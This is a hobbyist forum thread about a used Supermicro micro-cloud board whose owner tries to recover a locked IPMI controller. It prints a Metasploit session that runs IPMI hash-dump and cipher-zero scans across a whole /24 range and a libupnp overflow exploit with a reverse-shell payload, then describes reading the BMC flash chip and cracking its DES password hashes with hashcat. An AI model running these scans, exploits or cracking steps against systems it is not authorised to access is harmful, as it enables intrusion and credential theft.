EU ebay: Supermicro X10SLE-F (Micro-Cloud node) usually under 10 Euro

RageBone

Active Member
Jul 11, 2017
290
77
28
@DanAnd
Another option would be to Metasploit the ipmi.
There are a few things you can do with that. The most time consuming would be to retrieve the hash of the password, which you'd need to crack.

If you have soldering skills and equipment, you could also swap the ROM that the IPMI is stored on.
 
  • Like
Reactions: JustinClift

nerdalertdk

Fleet Admiral
Mar 9, 2017
151
63
28
::1
Okay, bought the ones that for the server but wanted 2u more just didn’t know what fits


Edit hmm this one seams to fit

SNK-P0048PS
 

RageBone

Active Member
Jul 11, 2017
290
77
28
@DanAnd you should be able to get a list list of users and the respective password hashes for them through metasploit as a last resort.
Could crack those hashes : )
 

DanAnd

Member
Jul 25, 2016
55
47
18
45
Dortmund, Germany
www.danand.de
As said, the IPMI Version is pretty safe, so all attempts didn't work out:
Code:
       =[ metasploit v5.0.36-dev-                         ]
+ -- --=[ 1905 exploits - 1072 auxiliary - 329 post       ]
+ -- --=[ 545 payloads - 44 encoders - 10 nops            ]
+ -- --=[ 2 evasion                                       ]

msf5 > use  auxiliary/scanner/ipmi/ipmi_version
msf5 auxiliary(scanner/ipmi/ipmi_version) > set RHOSTS 146.0.33.0/24
RHOSTS => 146.0.33.0/24
msf5 auxiliary(scanner/ipmi/ipmi_version) > run

[*] Sending IPMI requests to 146.0.33.0->146.0.33.255 (256 hosts)
[+] 146.0.33.34:623 - IPMI - IPMI-2.0 OEMID:4543232 UserAuth(auth_msg, auth_user, non_null_user) PassAuth(password, md5, md2) Level(1.5, 2.0)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/ipmi/ipmi_version) >
msf5 auxiliary(scanner/ipmi/ipmi_version) > use auxiliary/scanner/ipmi/ipmi_cipher_zero
msf5 auxiliary(scanner/ipmi/ipmi_cipher_zero) > set RHOSTS 146.0.33.0/24
RHOSTS => 146.0.33.0/24
msf5 auxiliary(scanner/ipmi/ipmi_cipher_zero) > run

[*] Sending IPMI requests to 146.0.33.0->146.0.33.255 (256 hosts)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/ipmi/ipmi_cipher_zero) >
msf5 auxiliary(scanner/ipmi/ipmi_cipher_zero) > use auxiliary/scanner/ipmi/ipmi_dumphashes
msf5 auxiliary(scanner/ipmi/ipmi_dumphashes) > set RHOSTS 146.0.33.0/24
RHOSTS => 146.0.33.0/24
msf5 auxiliary(scanner/ipmi/ipmi_dumphashes) > set THREADS 256
THREADS => 256
msf5 auxiliary(scanner/ipmi/ipmi_dumphashes) > run

[*] Scanned  27 of 256 hosts (10% complete)
[*] Scanned 134 of 256 hosts (52% complete)
[*] Scanned 149 of 256 hosts (58% complete)
[*] Scanned 225 of 256 hosts (87% complete)
[*] Scanned 230 of 256 hosts (89% complete)
[*] Scanned 231 of 256 hosts (90% complete)
[*] Scanned 246 of 256 hosts (96% complete)
[*] Scanned 253 of 256 hosts (98% complete)
[*] Scanned 254 of 256 hosts (99% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/ipmi/ipmi_dumphashes) >

       =[ metasploit v5.0.36-dev-                         ]
+ -- --=[ 1905 exploits - 1072 auxiliary - 329 post       ]
+ -- --=[ 545 payloads - 44 encoders - 10 nops            ]
+ -- --=[ 2 evasion                                       ]

msf5 > use exploit/multi/upnp/libupnp_ssdp_overflow
msf5 exploit(multi/upnp/libupnp_ssdp_overflow) > set RHOST 146.0.33.34
RHOST => 146.0.33.34
msf5 exploit(multi/upnp/libupnp_ssdp_overflow) > set LHOST 146.0.33.1
LHOST => 146.0.33.1
msf5 exploit(multi/upnp/libupnp_ssdp_overflow) > set PAYLOAD cmd/unix/reverse_openssl
PAYLOAD => cmd/unix/reverse_openssl
msf5 exploit(multi/upnp/libupnp_ssdp_overflow) > exploid
[-] Unknown command: exploid.
msf5 exploit(multi/upnp/libupnp_ssdp_overflow) > exploit

[*] Started reverse double SSL handler on 146.0.33.1:4444
[*] The system 146.0.33.34 did not reply to our M-SEARCH probe
[-] Exploit aborted due to failure: no-target: No compatible target detected
[*] Exploit completed, but no session was created.
msf5 exploit(multi/upnp/libupnp_ssdp_overflow) >
 
  • Like
Reactions: JustinClift

DanAnd

Member
Jul 25, 2016
55
47
18
45
Dortmund, Germany
www.danand.de
So I did it the hard way:
I looked out for the BMC's flash chip, cleaned up the pins and used a chip grabber and SPI programmer to read out the flash.
This was pretty straight forward, but I had to use an updated flashrom code, as the flash chip is a MX25L25635F which was not included in the current Ubuntu Linux release, which I am using.
After figuring out the pin-outs, I connected GND, MISO, MOSI, CLK, CS, but left +3,3V open. Then I powered up the board and read everything from the flash chip into a file.

Looking into the flash image, I found the wsman configuration, which points to a simple_auth.passwd file, which consists of 4 password hashes ;-)
The used encryption method is pretty old: Traditional Unix Crypt (DES). That means the password is at max 8 characters long and the valid characters are ascii 7-bit.

The first user is obvious: ADMIN with the hashed password of ADMIN.
Since ADMIN/ADMIN does not work on either IPMItool nor on the Webinterface, I assume they have disabled that user, which is quite clever, as every script-kiddy will try to attempt the default usernames on IPMI Interfaces.

So there are 3 hashes left. I give hashcat and my trusty Geforce 1060 GPU a try and hopefully I will figure out at least one password, so that I can do a factory reset. Then I can finally continue on my path to power up this little mainboard :)

Cheers,

Daniel
 

Guillem

Member
Nov 13, 2017
46
8
8
So the issue is 'powering up' the server as in pressing the 'power on' button? It just stays on standby when you connect it? If that is the case, I bet there has to be a couple of pins you can short that are coming from the power distribution board that will power on the system. Either shorting them or pulling one up to 5V or down to ground.
 

DanAnd

Member
Jul 25, 2016
55
47
18
45
Dortmund, Germany
www.danand.de
So the issue is 'powering up' the server as in pressing the 'power on' button? It just stays on standby when you connect it? If that is the case, I bet there has to be a couple of pins you can short that are coming from the power distribution board that will power on the system. Either shorting them or pulling one up to 5V or down to ground.
That's exactly what I think will be the easiest way. I contacted Supermicro Support on it, but they have to all the SM HQ first.

There is basically just 8 thin data cables coming from the chassis to the mainboard
 

Guillem

Member
Nov 13, 2017
46
8
8
So what happens when you press the power switch on the board? Does it even try to do something?
 

Guillem

Member
Nov 13, 2017
46
8
8
I imagined you did, but just in case :)

What I would suggest is to find next to the thin cable connector on the motherboard an IC for power control. A lot of times this is an ADMxxxx, which tends to be in a small package with somewhere between 16 and 30 pins. If you find that, I bet one of the pins is connected to the enable specified on the datasheet, so you will just need to figure to which connector pin it's routed and provide the necessary voltage/gnd.
 
  • Like
Reactions: JustinClift